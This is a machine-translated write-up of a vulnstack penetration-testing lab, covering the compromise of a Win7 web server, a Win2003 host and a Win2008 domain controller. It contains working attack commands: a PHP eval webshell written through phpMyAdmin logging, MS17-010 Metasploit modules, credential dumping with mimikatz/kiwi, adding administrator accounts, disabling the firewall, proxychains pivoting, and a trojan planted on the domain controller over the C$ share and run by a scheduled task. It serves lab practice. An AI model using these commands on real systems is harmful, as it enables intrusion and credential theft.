Let me write it out front

The first attempt at this penetration range , I finished the exam in three days , It will be followed by other shooting ranges ( It's so delicious and fun )

Range address ：vulunstack

Range building

Win7： password : cys121`
Extranet 192.168.47.132
Intranet 192.168.52.143

Win2008 password ：cys121`
Intranet 192.168.52.138

Win2003 password :cys121`
Intranet 192.168.52.141

After each other ping The three machines in the Intranet can communicate with each other ping through

Kali
Extranet 192.168.47.129

Kali( attack )： Extranet 192.168.47.129
Win7(VM1)： Extranet 192.168.47.132 Intranet 192.168.52.143
Win2003(VM2) Domain members 192.168.52.141
Win2008(VM3) Domain control 192.168.52.138

start-up win7 phpstudy：

Information gathering

visit win7 php Web Services ：

See is php probe

Nmap Scan which ports are open ： Turn on 80 port

Mitsurugi scanning ： Find out phpmyadmin

dirsearch I also got some

I didn't scan here /yxcms/

Here, you can use the vulnerability of the web page to log in to the background for file editing and write a sentence getshell, Not here

Exploit getshell

backstage Getshell

Get into /phpmyadmin

The default account and password login succeeded ：root root

Try to use into outfile Execute write a sentence getshell Failure ：

select "<?php eval($_POST[shell]);?>" into out file '/tmp/cyshack.php'

The reason is that the write function is not enabled

Try Open global log utilize getshell

 show variables like '%general%';

You can see that the function is turned off and the path of the log file is echoed

Try opening and changing the path

 set global general_log='on'
 set global general_log_file='C:/phpStudy/www/cyshack.php' 

Write a sentence ：

 select "<?php eval($_POST[shell]);?>"

Ant sword link ：

success getshell：

Ant sword use

The ant sword inquires the identity ：

Add users ：

 net user cys [email protected] /add

( Add a name cys  The password for [email protected] Username ）

see cys user :

Turn off firewall ：

 netsh advfirewall set allprofiles state off

control win7

Access permissions

There are two ways ：

   The Trojan horse bounced shell
  SMB ms17_010

Msvemon Create a Trojan

Ant sword upload Trojan horse

Running a Trojan horse ：

stay kali Just set listening

Try ms17_010：

attack Take down win7 jurisdiction ：

Increase authority

 Sysinfo
 Getuid  ( Found to be administor jurisdiction )
 Getsystem ( obtain system jurisdiction )

msf Of getsystem Command principle

Host password collection

Hashdump： See the password hash value of the user

Mimikatz： Grab the plaintext password
ps：mimikatz Modules have been merged into kiwi modular

Metasploit- Advanced user password and mimikatz modular kiwi modular

load_kiwi:

creds_all Command to get the password directly ：

Remote Desktop Connection

Nmap Did not open 3389

meterpreter Try to turn on 3389：

 run post/windows/manage/enable_rdp

Try remote login ：

 rdesktop -g 1440x900 -r disk:LinuxxDisk=/root/Downloads -u STU1 -p " password " 192.168.47.132

Intranet collection

ipconfig See another ip：

It should be an intranet segment

Use ipconfig /all see DNS The server ：
Find out DNS The server name is god.org

View domain information ：net view

View primary domain information ：net view /domain

There are many online collection methods , No more

Add route , hang socks4a agent

Before lateral penetration , First of all web The server is configured as a proxy server as a springboard .

Add route

View route information , Add a route to the target environment network

The purpose is In order to make MSF Can pass Win7 Route forward access , bring msf Commands can be passed through win7 Access to the Intranet

Run get_local_subnets   // You can use this command to view the information on the intranet side and the public network side of the target machine .

Add intranet route bring msf6 Can pass win7 Route forwarding to access the intranet 192.168.52.0/24 Network segment

 run autoroute -s 192.168.52.0/24

such , We can go through msf Get into .52 Network segment

Scan now 52 Network segment ：

run post/windows/gather/arp_scanner RHOSTS=192.168.52.0/24

Scan surviving hosts ：

 use auxiliary/scanner/netbios/nbname

Intranet port information ：

use auxiliary/scanner/portscan/tcp

hang socks4a agent

Hang up the agent to make Other tools Can pass win7 , To visit 192.168.52.0/24 Network segment

To configure msf agent ：

 use auxiliary/server/socks_proxy

run And then appear starting... ,jobs You can view the current agent task , If appear stoping..., Try changing SRVHOST To configure perhaps Modify the following configuration file

If proxychains There is a problem configuring the terminal agent Modify the file

Open is /etc/proxychains.config

After setting the agent successfully When using other tools, you need to add proxychains:

Nmap scanning 192.168.52.141

proxychains nmap -Pn -sT 192.168.52.141  // -Pn -sT  There is no shortage of 

penetration win2003( Remote login )

information gathering

Scan host version

use auxiliary/scanner/smb/smb_version 

scanning 192.168.52.141 System version information yes win2003

nmap Scanning port, etc

Try to attack

from nmap See open 445 port
Try the eternal blue attack win2003

 use exploit/windows/smb/ms17_010_psexec   //windows 2003  The attack module of 

 set payload windows/meterpreter/bind_tcp

You can see that permission can be obtained but win7 Disconnect directly

Try it again ：

Is still ：（ Break off frequently win7 control power , I'm going to have to call it again ）

obtain win7 After the authority Be sure to check your permissions first

getuid
getsystem
(shell) netsh advfirewall set allprofiles state off // Turn off firewall 

One more time ： Yes, but other commands cannot be executed

Try ms08-067 Didn't hit down

Sure Execute some commands with system permissions , Add administrator user attempt 3389 Sign in

use auxiliary/admin/smb/ms17_010_command 

Because it's on 445 port ：

use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.52.141
set command net user cyshack @[email protected] /add  # Add users 
run  # Successful execution 
set command net localgroup administrators cyshack /add  # Administrator rights 
run  # Successful execution 
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'  // Turn on 3389 port 
run # Successful execution 

System permission command ：

cyshack user ：

3389：

And then use proxychains Connect his 3389(cyshack The user login )

 Proxychains rdesktop 192.168.52.141 

trend win2008(C Disk sharing transmission )

msf attack win2008 example

information gathering

Scan version information ：

use auxiliary/scanner/smb/smb_version

Nmap： Open the 135 and 445 , 3389 Did not open

Eternal blue and 135 Port vulnerabilities all failed Give up loopholes

Use command ： Users can be added

use auxiliary/admin/smb/ms17_010_command

To open or find a new path or snap course

win7 Get the password of the user in the domain ：

 kiwi_cmd sekurlsa::logonpasswords

Here use win7 Send a message to the domain controller msf Horse , And let the horse in the domain control Timed on Then we just need to kali Set listening that will do

Generative horse ：( Set bounce shell To win7 Of 9999 port )

First win7 Connect domain controlled c Disk sharing

 (shell) net use \\192.168.52.138\c$ "cys121`" /user:"administrator"

Check out domain controlled c Disk resources ：

(shell) dir \\192.168.52.138\c$

It means success

Upload msf Ma Dao win7:

(win7 meterpreter) upload

take win7 Your horse is shared with the domain controller ：

(shell) copy c:\Windows\System32\cyshoumen.exe \\192.168.52.138\c$

See domain controller ：

Set up a task plan , Start the Trojan regularly ：

schtasks /create /tn "test" /tr C:\cyshoumen.exe /sc once /st 22:14 /S 192.168.52.138 /RU System /u administrator /p "cys121`"

Set listening ： At this point, you should listen win7 Of 9999 port

It will rebound after the time point shell：

Take down

Reference resources

Good article 1
Good article 2
Good article 3